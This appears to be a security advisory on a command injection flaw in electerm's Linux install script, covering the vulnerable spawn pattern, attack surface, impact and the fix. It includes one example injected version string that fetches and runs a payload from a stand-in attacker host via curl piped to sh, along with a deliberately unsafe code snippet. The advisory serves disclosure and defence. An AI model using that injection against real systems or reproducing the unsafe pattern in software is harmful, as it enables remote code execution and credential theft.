Overview
A critical command injection vulnerability (CVE-2026-41501) has been disclosed in electerm, a widely used open-source terminal, SSH, SFTP, RDP, and VNC client. The flaw exists in npm/install.js at line 130, within the runLinux() function, which appends remotely sourced version strings directly into a shell command without any sanitization.
The vulnerability carries a CVSS score of 9.8 (Critical) and is closely related to CVE-2026-41500 (the macOS variant). Both flaws were patched in electerm version 3.3.8.
Affected Versions
| Product | Affected Versions | Fixed Version |
|---|---|---|
| electerm (Linux) | All versions before 3.3.8 | 3.3.8 |
Technical Details
The runLinux() function at npm/install.js:130 fetches version information from a remote release endpoint and constructs a shell command string through direct string concatenation:
// Vulnerable pattern (simplified)
const version = releaseInfo.version; // remote, unvalidated
const cmd = `chmod +x /tmp/electerm-${version}-linux.AppImage`;
spawn(cmd, { shell: true });
Because version is derived from remote data without integrity validation, an attacker who controls or intercepts the update response can inject arbitrary shell metacharacters. For example, a version string such as "3.3.7; curl http://attacker.example/payload | sh" would be interpreted by the shell as two separate commands.
The use of { shell: true } in the spawn call is the root enabling condition — it causes Node.js to hand the entire string to /bin/sh, where shell metacharacters are interpreted.
Attack Surface
- Malicious update server: If the electerm update CDN or release API is compromised
- MITM on HTTP: Update checks over unencrypted connections on hostile networks
- DNS spoofing: Redirecting update hostname resolution to an attacker server
Relationship to CVE-2026-41500
CVE-2026-41500 and CVE-2026-41501 are sister vulnerabilities affecting the macOS and Linux code paths respectively. They share the same root cause — unsanitized remote data passed to a shell spawn — but differ in the function name (runMac() vs runLinux()) and the line number within install.js. Both were disclosed on 2026-05-08 and fixed in the same release.
Impact
Successful exploitation grants an attacker arbitrary command execution with the privileges of the user running electerm, which for developers and sysadmins typically means access to:
- SSH private keys and known hosts
- Active terminal sessions and credentials
- Local files and secrets accessible to the running user
- Internal network resources reachable via the compromised host
Remediation
Update to electerm 3.3.8 or later immediately.
# Verify current version
electerm --version
# Update via npm
npm update -g electerm
# Alternatively, download the latest AppImage from GitHub releases
# and verify the SHA-256 checksum before runningIf updating is not immediately possible:
- Disable automatic update checks
- Block outbound connections from electerm to update endpoints via firewall
- Only install new versions from verified GitHub release artifacts with checksum validation
References
- NVD Entry — CVE-2026-41501
- NVD Entry — CVE-2026-41500 (macOS variant)
- electerm GitHub Repository
- electerm v3.3.8 Release
Timeline
| Date | Event |
|---|---|
| 2026-05-08 | CVE published to NVD |
| 2026-05-08 | electerm 3.3.8 released with fix |